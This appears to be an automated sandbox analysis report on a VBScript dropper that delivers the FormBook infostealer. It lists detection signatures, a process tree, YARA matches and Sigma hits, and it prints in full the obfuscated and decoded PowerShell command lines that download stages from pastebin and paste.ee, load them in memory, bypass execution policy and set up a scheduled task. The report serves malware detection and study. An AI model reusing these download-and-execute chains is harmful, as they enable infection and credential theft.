Windows Analysis Report
PURCHASE OKK.vbs

Overview

General Information

Sample name: PURCHASE OKK.vbs
Analysis ID: 1665559
MD5: 38258b62eac1814f6e038be7bb84dafe
SHA1: aea92f71513715ead9096bfabc2656fbddc10b2a
SHA256: abba2995a8e1364f0e3a23e247483d79830d7d8558356877a9960c4ce62e9bbd
Tags: vbs, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Paste sharing url in reverse order
Suricata IDS alerts for network traffic
Yara detected FormBook
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential dropper URLs found in powershell memory
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7588 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • schtasks.exe (PID: 7664 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn task name /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7720 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C
??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?Jw?s?C??Jw?n?D??Jw?n?Cw?I??n?Cc?MQ?n?Cc?L??g?Cc?JwBS?G8?Z?Bh?Cc?Jw?g?C??KQ?g?Ck?I??7?Cc?I??7?CQ?VgBC?Fc?VwB6?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??z?C4?c?Bz?DE?Jw?g?Ck?I??7?CQ?TQBP?EQ?UgBn?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BW?EI?VwBX?Ho?I??g?C0?ZgBv?HI?YwBl?C??OwBw?G8?dwBl?HI?cwBo?GU?b?Bs?C??LQBF?Hg?ZQBj?HU?d?Bp?G8?bgBQ?G8?b?Bp?GM?eQ?g?EI?eQBw?GE?cwBz?C??LQBG?Gk?b?Bl?C??J?BW?EI?VwBX?Ho?I??7??==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\PURCHASE OKK.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 8040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MSBuild.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • DmMVOWsP1JSI77P.exe (PID: 2252 cmdline: "C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\ElCKIdTD.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • iexpress.exe (PID: 1420 cmdline: "C:\Windows\SysWOW64\iexpress.exe" MD5: D594B2A33EFAFD0EABF09E3FDC05FCEA)
                • DmMVOWsP1JSI77P.exe (PID: 3748 cmdline: "C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\v7rWi9QIDxHSX.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 5468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 5200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Memory dumps (Source, Rule, Description, Author, Strings):
  • Source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Unpacked PEs (Source, Rule, Description, Author, Strings):
  • Source: 10.2.MSBuild.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 10.2.MSBuild.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  • Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
  • Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL, Description: Detects executables (downloaders) containing reversed URLs to raw contents of a paste, Author: ditekSHen
    • 0xc1399:$u1: /moc.nibetsap//:sptth
    • 0xc3bac:$u1: /moc.nibetsap//:sptth
  • Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Author: ditekSHen
    • 0xc13a6:$h2: //:sptth
    • 0xc3bc6:$h2: //:sptth
    • 0xc13d0:$s1: DownloadString
    • 0xc3c8c:$s1: DownloadString
    • 0xd277c:$s1: DownloadString
    • 0xc13c5:$s2: StrReverse
    • 0xc3c5c:$s2: StrReverse
    • 0xc1437:$s3: FromBase64String
    • 0xc3e2c:$s3: FromBase64String
    • 0xd6fc:$s4: WebClient

Networking

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower

System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8
?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content 